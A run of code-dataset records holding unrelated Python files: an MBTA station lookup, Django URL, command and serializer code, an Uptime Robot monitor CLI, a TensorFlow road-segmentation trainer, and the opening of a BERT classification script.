':\n new_place = new_place + letter\n else:\n new_place += '%20'\n\n\n url = GMAPS_BASE_URL +'address=' + new_place\n\n\n json_data = get_json(url)\n\n return json_data['results'][0]['geometry']['location']['lat'], json_data['results'][0]['geometry']['location']['lng']\n\n\n\ndef get_nearest_station(latitude, longitude):\n \"\"\"\n Given latitude and longitude strings, return a (station_name, distance)\n 
tuple for the nearest MBTA station to the given coordinates.\n See http://realtime.mbta.com/Portal/Home/Documents for URL\n formatting requirements for the 'stopsbylocation' API.\n \"\"\"\n\n\n\n MBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\n MBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n url_m = MBTA_BASE_URL +'?api_key=' + MBTA_DEMO_API_KEY + \"&lat=\" + str(latitude) + \"&lon=\" + str(longitude) + '&format=json'\n station_json = get_json(url_m)\n station_name = station_json['stop'][0]['stop_name']\n distance = station_json['stop'][0]['distance']\n distance = '{:.2f}'.format(float(distance))\n return (station_name, distance)\n\n\n\n\ndef find_stop_near(place_name):\n \"\"\"\n Given a place name or address, return the nearest MBTA stop and the \n distance from the given place to that stop.\n \"\"\"\n\n lat, lng = get_lat_long(place_name)\n return get_nearest_station(lat, lng)\n\n\n\nprint(find_stop_near('fenway park'))\n\n# find_stop_near('fenway')\n", "sub_path": "src/mbta_helper.py", "file_name": "mbta_helper.py", "file_ext": "py", "file_size_in_byte": 2561, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 22, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 22, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}]} {"seq_id": "243267383", "text": "\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nimport app01.views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',app01.views.index, name='index'),\n path('word',app01.views.word, name='word'),\n path('blog',app01.views.blog, name='blog'),\n path('new',app01.views.new, name='new'),\n path('create', app01.views.create, name='create'),\n path('detail/', app01.views.detail, name='detail'),\n path('delete/', app01.views.delete, name='delete'),\n path('update/', app01.views.update, name=\"update\"),\n path('ud/', app01.views.ud, name=\"ud\")\n]\n", "sub_path": "Django/project/project/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 22, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 23, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 24, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 26, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 27, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 27, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 30, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 30, "usage_type": "name"}]} {"seq_id": "4284597", "text": "from django.core.management.base import BaseCommand, CommandError\n\nfrom app import models\n\n_twitteruser_username = \"10sr\"\n_twitteruser_id_str = \"73722749\"\n\n\nclass Command(BaseCommand):\n help = \"Count sleep record num\"\n\n def add_arguments(self, parser):\n return\n\n def handle(self, *args, **kargs):\n try:\n user = 
models.TwitterUser.objects.get(username=_twitteruser_username)\n            self.stdout.write(\"TwitterUser `{}' already exists\".format(user))\n        except models.TwitterUser.DoesNotExist as e:\n            self.stdout.write(\n                \"TwitterUser {} does not exist, creating\".format(_twitteruser_username)\n            )\n            models.TwitterUser(\n                username=_twitteruser_username, id_str=_twitteruser_id_str\n            ).save()\n        # return\n", "sub_path": "app/management/commands/local_addrecords.py", "file_name": "local_addrecords.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 9, "usage_type": "name"}, {"api_name": "app.models.TwitterUser.objects.get", "line_number": 17, "usage_type": "call"}, {"api_name": "app.models.TwitterUser", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.models", "line_number": 17, "usage_type": "name"}, {"api_name": "app.models.TwitterUser", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.models", "line_number": 19, "usage_type": "name"}, {"api_name": "app.models.TwitterUser", "line_number": 23, "usage_type": "call"}, {"api_name": "app.models", "line_number": 23, "usage_type": "name"}]} {"seq_id": "228990429", "text": "#!/usr/bin/env python3\n\nimport http.client\nimport json\nimport sys\nimport os\n\n\nAPI_KEY = os.environ.get('UPTIME_ROBOT_API_KEY')\nif API_KEY == None:\n\tprint(\"API Key not found. Be sure to set UPTIME_ROBOT_API_KEY environment variable.\")\n\tsys.exit()\n\n\nALERT_CONTACT_ID = os.environ.get('UPTIME_ROBOT_ALERT_CONTACTS')\nif ALERT_CONTACT_ID == None:\n\tprint(\"Alert contacts not set. Be sure to set UPTIME_ROBOT_ALERT_CONTACTS environment variable.\")\n\tsys.exit()\n\n\nINTERVAL = 60\nLIMIT = 50\nMONITORS = {'monitors': []}\n\n\nclass bcolors:\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n\ndef uptimeRequest(location,payload):\n\n\tdefault_payload = \"api_key=\"+ API_KEY\n\tdefault_payload += \"&format=json\"\n\n\tdefault_payload += payload\n\theaders = {\n \t\t'content-type': \"application/x-www-form-urlencoded\",\n \t\t'cache-control': \"no-cache\"\n\t}\n\tconn = http.client.HTTPSConnection(\"api.uptimerobot.com\")\n\tconn.request(\"POST\", location, default_payload, headers) \n\tres = conn.getresponse()\n\tdata = res.read()\n\treturn(json.loads(data))\n\ndef getMonitors(page = 1, offset = 0):\n\n\tpayload = \"&alert_contacts=1\"\n\tpayload += \"&offset=\"+str(offset)\n\tpayload += \"&limit=\"+str(LIMIT)\n \n\tdata = uptimeRequest(\"/v2/getMonitors\",payload)\n\t\n\tfor monitor in data['monitors']:\n\t\ti = len(MONITORS) + 1\n\t\tMONITORS['monitors'].append(monitor)\n\n\t#calculate pagination\n\tpage = int(page) + 1\n\toffset = (LIMIT * page) - LIMIT\n\tif offset < data['pagination']['total']:\n\t\tgetMonitors(page, offset)\n\ndef listMonitors():\n\tgetMonitors()\n\tfor monitor in MONITORS['monitors']:\n\n\t\tif monitor['status'] == 0:\n\t\t\tstatus = bcolors.OKGREEN + \"paused\" + bcolors.ENDC\n\t\telif monitor['status'] == 1:\n\t\t\tstatus = bcolors.OKGREEN + \"paused\" + bcolors.ENDC\n\t\telif monitor['status'] == 2:\n\t\t\tstatus = bcolors.OKGREEN + \"online\" + bcolors.ENDC\n\t\telse:\n\t\t\tstatus = bcolors.FAIL + \"offline\" + bcolors.ENDC\n\t\tprint(monitor['friendly_name'],status)\n\ndef listMonitorIdByName(name):\n\tgetMonitors()\n\tfor monitor in 
MONITORS['monitors']:\n\t\tif name == monitor['friendly_name']:\n\t\t\treturn(monitor['id'])\n\ndef deleteMonitorByName(name):\n\treturn deleteMonitorById(listMonitorIdByName(name))\n\ndef deleteMonitorById(id):\n\tpayload = \"&id=\"+str(id)\n\tprint(uptimeRequest(\"/v2/deleteMonitor\",payload))\n\n\ndef addMonitor(monitor_type, url):\n\n\t#types\n\t#1 - HTTP(s)\n\t#2 - Keyword\n\t#3 - Ping\n\t#4 - Port\n\t\n\t#sub types\n\t#1 - HTTP (80)\n\t#2 - HTTPS (443)\n\t#3 - FTP (21)\n\t#4 - SMTP (25)\n\t#5 - POP3 (110)\n\t#6 - IMAP (143)\n\t#99 - Custom Port\n\n\tif monitor_type == \"http\":\n\t\tMONITOR_TYPE = \"1\"\n\t\tSUB_TYPE = \"1\"\n\t\tPORT = \"\"\n\t\tURL = \"http://\"+url\n\telif monitor_type == \"https\":\n\t\tMONITOR_TYPE = \"1\"\n\t\tSUB_TYPE = \"2\"\n\t\tPORT = \"\"\n\t\tURL = \"https://\"+url\n\telif monitor_type == \"smtp\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"4\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telif monitor_type == \"imap\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"6\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telif monitor_type == \"ssh\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"99\"\n\t\tPORT = \"22\"\n\t\tURL = url\n\telif monitor_type == \"mysql\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"99\"\n\t\tPORT = \"3306\"\n\t\tURL = url\n\telif monitor_type == \"ping\":\n\t\tMONITOR_TYPE = \"3\"\n\t\tSUB_TYPE = \"\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telse:\n\t\tprint(\"invalid monitor type\")\n\t\tsys.exit()\n\t\n\tFRIENDLY_NAME = url + \" \" + monitor_type\n\t\n\tpayload = \"&type=\"+MONITOR_TYPE\n\tif SUB_TYPE:\n\t\tpayload += \"&sub_type=\"+SUB_TYPE\n\tif PORT:\n\t\tpayload += \"&port=\"+PORT\n\tpayload += \"&url=\"+URL\n\tpayload += \"&friendly_name=\"+FRIENDLY_NAME\n\tpayload += \"&interval=\"+str(INTERVAL)\n\tpayload += \"&alert_contacts=\"+ALERT_CONTACT_ID\n\n\tprint(uptimeRequest(\"/v2/newMonitor\",payload))\n\ndef getAlertContacts():\n\tpayload = \"\"\n\n\tjson_results = uptimeRequest(\"/v2/getAlertContacts\",payload)\n\tfor alert_contact in json_results['alert_contacts']:\n\t\tprint(alert_contact['id'],alert_contact['friendly_name'])\n\nargs = sys.argv[1:]\n\nif len(args) == 0:\n\tlistMonitors()\n\nelif args[0] == \"monitors\":\n\tlistMonitors()\n\nelif args[0] == \"monitorid\":\n\tprint(listMonitorIdByName(args[1]))\n\nelif args[0] == \"contacts\":\n\tgetAlertContacts()\n\nelif args[0] == \"create\":\n\tif len(args) == 3:\n\t\taddMonitor(args[1], args[2])\n\telse:\n\t\tprint(\"invalid usage. \\n uptimerobot.py create \")\n\nelif args[0] == \"delete\":\n\tif len(args) == 2:\n\t\tdeleteMonitorById(args[1])\n\telse:\n\t\tprint(\"invalid usage. \\n uptimerobot.py delete \")\nelse:\n\tprint(\"invalid command. 
\\n\")\n\tprint(\"uptimerobot-cli monitors\")\n\tprint(\"uptimerobot-cli monitorid \")\n\tprint(\"uptimerobot-cli contacts\")\n\tprint(\"uptimerobot-cli create \")\n\tprint(\"uptimerobot-cli delete \")", "sub_path": "uptimerobot.py", "file_name": "uptimerobot.py", "file_ext": "py", "file_size_in_byte": 4624, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 18, "usage_type": "call"}, {"api_name": "http.client.client.HTTPSConnection", "line_number": 46, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 46, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 46, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 175, "usage_type": "attribute"}]} {"seq_id": "606065995", "text": "###############################################################################################################################\n# 3 Model serializers\n# 1. They can automatically generate the field declarations for us (mainly extracted from the field declarations on the model)\n# 2. A model serializer also provides the create and update method implementations for us\n###############################################################################################################################\nfrom rest_framework import serializers\nfrom booktest.models import BookInfo\nclass BookInfoModelSerializer(serializers.ModelSerializer):\n    # A model serializer can also declare custom validation fields (for data that is not stored in the database\n    # but must be submitted by the frontend, e.g. a captcha or a password confirmation)\n\n    class Meta:\n        model=BookInfo\n        fields = \"__all__\"\n        # Constraint options can be set for the specified fields of the model serializer\n        extra_kwargs = {\n            \"bread\":{\"min_value\":0,\"required\":True},\n        }\n\n    # Custom validation method (validates a single field; several such methods may exist)\n    # def validate_<field_name>(self,data): # data is the value of the current field\n    def validate_btitle(self,data):\n        print(\"----fetch the data passed in from the view class---\")\n        print(self.context.get(\"view\"))\n        # The view class can attach extra data for direct use inside the serializer (see line 69 of view.py)\n        # print(self.context.get(\"view\").user)\n        print(\"----fetch the data passed in from the view class---\")\n        # For example, the book title must not be 红楼梦 (Dream of the Red Chamber)\n        if data==\"红楼梦\":\n            # raise an error\n            raise serializers.ValidationError(\"红楼梦 is a banned book~\")\n        # A validation method must return the value to the field, otherwise the field ends up empty\n        return data\n\n    # Custom validation method (validates several or all fields; may appear only once)\n    def validate(self,data): # data holds the contents of all the fields, as a dict\n        bread = data.get(\"bread\")\n        bcomment = data.get(\"bcomment\")\n        if bread>=bcomment:\n            return data\n        raise serializers.ValidationError(\"Read count is lower than comment count, the data looks too fake\")
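\n\n# Illustrative usage (hypothetical shell session, not part of the original file):\n#   s = BookInfoModelSerializer(data={\"btitle\": \"Journey to the West\", \"bread\": 10, \"bcomment\": 5})\n#   s.is_valid()  # runs the validate_btitle and validate hooks defined above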
"rest_framework.serializers", "line_number": 41, "usage_type": "name"}]} {"seq_id": "257334042", "text": "import os.path\nimport tensorflow as tf\nimport helper\nimport warnings\nfrom distutils.version import LooseVersion\nimport tests\n\n\nprint('TensorFlow Version: {}'.format(tf.__version__))\nassert (LooseVersion(tf.__version__) >= LooseVersion('1.0'),\n 'Please use TensorFlow version 1.0 or newer.')\n\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n tf.saved_model.loader.load(sess, ['vgg16'], vgg_path)\n graph = tf.get_default_graph()\n\n image_input = graph.get_tensor_by_name('image_input:0')\n keep_prob = graph.get_tensor_by_name('keep_prob:0')\n layer3 = graph.get_tensor_by_name('layer3_out:0')\n layer4 = graph.get_tensor_by_name('layer4_out:0')\n layer7 = graph.get_tensor_by_name('layer7_out:0')\n \n return image_input, keep_prob, layer3, layer4, layer7\n\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n layer3 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer4 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer7 = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n decode1 = tf.layers.conv2d_transpose(layer7, num_classes, 4, 2, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n decode2 = tf.add(decode1, layer4)\n decode3 = tf.layers.conv2d_transpose(decode2, num_classes, 4, 2, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n decode4 = tf.add(decode3, layer3)\n output = tf.layers.conv2d_transpose(decode4, num_classes, 16, 8, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n return output\n\ntests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n labels = tf.reshape(correct_label, (-1, num_classes))\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels)\n cross_entropy_loss = tf.reduce_mean(cross_entropy)\n\n optimizer = tf.train.AdamOptimizer(learning_rate)\n train_op = optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\n\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate):\n sess.run(tf.global_variables_initializer())\n print('Training...')\n print()\n\n for epoch in range(epochs):\n print('EPOCH {} ...'.format(epoch+1))\n\n for image, label in get_batches_fn(batch_size):\n _, loss = sess.run([train_op, cross_entropy_loss],\n feed_dict={input_image: image, correct_label: label,\n keep_prob: 0.5, learning_rate: 0.0005})\n print('Loss: {}'.format(loss))\n \n print()\n\ntests.test_train_nn(train_nn)\n\n\ndef run():\n num_classes = 2\n image_shape = (160, 576)\n data_dir = './data'\n runs_dir = './runs'\n\n tests.test_for_kitti_dataset(data_dir)\n helper.maybe_download_pretrained_vgg(data_dir)\n\n # OPTIONAL: Train and Inference on the cityscapes dataset instead of the Kitti dataset.\n # Needs a GPU with at least 10 teraFLOPS to train on.\n # 
https://www.cityscapes-dataset.com/\n\n with tf.Session() as sess:\n vgg_path = os.path.join(data_dir, 'vgg')\n get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n epochs = 50\n batch_size = 5\n\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes])\n learning_rate = tf.placeholder(tf.float32)\n\n input_image, keep_prob, layer3, layer4, layer7 = load_vgg(sess, vgg_path)\n output = layers(layer3, layer4, layer7, num_classes)\n logits, train_op, cross_entropy_loss = optimize(output, correct_label, learning_rate, num_classes)\n\n train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate)\n\n helper.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n\nif __name__ == '__main__':\n run()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4615, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tensorflow.__version__", "line_number": 9, "usage_type": "attribute"}, {"api_name": "distutils.version.LooseVersion", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.__version__", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.test.gpu_device_name", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.test", "line_number": 13, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.test.gpu_device_name", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.test", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.saved_model.loader.load", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.saved_model", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 21, "usage_type": "call"}, {"api_name": "tests.test_load_vgg", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 44, 
"usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 49, "usage_type": "attribute"}, {"api_name": "tests.test_layers", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tests.test_optimize", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 73, "usage_type": "call"}, {"api_name": "tests.test_train_nn", "line_number": 88, "usage_type": "call"}, {"api_name": "tests.test_for_kitti_dataset", "line_number": 97, "usage_type": "call"}, {"api_name": "helper.maybe_download_pretrained_vgg", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 105, "usage_type": "name"}, {"api_name": "helper.gen_batch_function", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 106, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 111, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 111, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 112, "usage_type": "attribute"}, {"api_name": "helper.save_inference_samples", "line_number": 121, "usage_type": "call"}]} {"seq_id": "476421959", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport csv\nimport json\nimport os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom bert import modeling\nfrom bert import optimization\nfrom bert import tokenization\n\nMIN_FLOAT = -1e30\n\nflags = tf.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\"bert_config_file\", None, \"The config json file corresponding to the pre-trained BERT model.\")\nflags.DEFINE_string(\"vocab_file\", None, \"The vocabulary file that the BERT model was 
trained on.\")\nflags.DEFINE_string(\"data_dir\", None, \"The input data dir. Should contain the .json files for the task.\")\nflags.DEFINE_string(\"task_name\", None, \"The name of the task to train.\")\nflags.DEFINE_string(\"output_dir\", None, \"The output directory where the model checkpoints will be written.\")\nflags.DEFINE_string(\"export_dir\", None, \"The export directory where the saved model will be written.\")\n\nflags.DEFINE_string(\"init_checkpoint\", None, \"Initial checkpoint (usually from a pre-trained BERT model).\")\nflags.DEFINE_bool(\"do_lower_case\", True, \"Whether to lower case the input text. True for uncased models and False for cased models.\")\n\nflags.DEFINE_integer(\"random_seed\", 100, \"Random seed for weight initialization.\")\nflags.DEFINE_string(\"predict_tag\", None, \"Predict tag for predict result tracking.\")\n\nflags.DEFINE_integer(\n \"max_seq_length\", 128,\n \"The maximum total input sequence length after WordPiece tokenization. \"\n \"Sequences longer than this will be truncated, and sequences shorter than this will be padded.\")\n\nflags.DEFINE_bool(\"do_train\", False, \"Whether to run training.\")\nflags.DEFINE_bool(\"do_eval\", False, \"Whether to run evaluation.\")\nflags.DEFINE_bool(\"do_predict\", False, \"Whether to run prediction.\")\nflags.DEFINE_bool(\"do_export\", False, \"Whether to run exporting.\")\n\nflags.DEFINE_integer(\"train_batch_size\", 32, \"Total batch size for training.\")\nflags.DEFINE_integer(\"eval_batch_size\", 8, \"Total batch size for eval.\")\nflags.DEFINE_integer(\"predict_batch_size\", 8, \"Total batch size for predict.\")\n\nflags.DEFINE_float(\"learning_rate\", 5e-5, \"The initial learning rate for Adam.\")\nflags.DEFINE_float(\"num_train_epochs\", 3.0, \"Total number of training epochs to perform.\")\nflags.DEFINE_float(\"warmup_proportion\", 0.1, \"Proportion of training to perform linear learning rate warmup for.\")\n\nflags.DEFINE_integer(\"save_checkpoints_steps\", 1000, \"How often to save the model checkpoint.\")\nflags.DEFINE_integer(\"iterations_per_loop\", 1000, \"How many steps to make in each estimator call.\")\n\nflags.DEFINE_bool(\"use_tpu\", False, \"Whether to use TPU or GPU/CPU.\")\nflags.DEFINE_integer(\"num_tpu_cores\", 8, \"Only used if \`use_tpu\` is True. Total number of TPU cores to use.\")\nflags.DEFINE_string(\"master\", None, \"[Optional] TensorFlow master URL.\")\n\nflags.DEFINE_string(\n \"tpu_name\", None,\n \"The Cloud TPU to use for training. This should be either the name \"\n \"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 url.\")\n\nflags.DEFINE_string(\n \"tpu_zone\", None,\n \"[Optional] GCE zone where the Cloud TPU is located in. If not \"\n \"specified, we will attempt to automatically detect the GCE project from metadata.\")\n\nflags.DEFINE_string(\n \"gcp_project\", None,\n \"[Optional] Project name for the Cloud TPU-enabled project. If not \"\n \"specified, we will attempt to automatically detect the GCE project from metadata.\")\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n def __init__(self,\n guid,\n text,\n sent_label=None):\n \"\"\"Constructs an InputExample.\n\n Args:\n guid: Unique id for the example.\n text: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n sent_label: (Optional) string. The sentence label of the example. 
This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.guid = guid\n self.text = text\n self.sent_label = sent_label\n\nclass PaddingInputExample(object):\n \"\"\"Fake example so the num input examples is a multiple of the batch size.\n \n When running eval/predict on the TPU, we need to pad the number of examples\n to be a multiple of the batch size, because the TPU requires a fixed batch\n size. The alternative is to drop the last batch, which is bad because it means\n the entire output data won't be generated.\n \n We use this class instead of \`None\` because treating \`None\` as padding\n batches could cause silent errors.\n \"\"\"\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n def __init__(self,\n input_ids,\n input_masks,\n segment_ids,\n sent_label_id):\n self.input_ids = input_ids\n self.input_masks = input_masks\n self.segment_ids = segment_ids\n self.sent_label_id = sent_label_id\n\nclass ClassificationProcessor(object):\n \"\"\"Processor for the classification data set.\"\"\"\n def __init__(self,\n data_dir,\n task_name):\n self.data_dir = data_dir\n self.task_name = task_name\n \n def get_train_examples(self):\n \"\"\"Gets a collection of \`InputExample\`s for the train set.\"\"\"\n 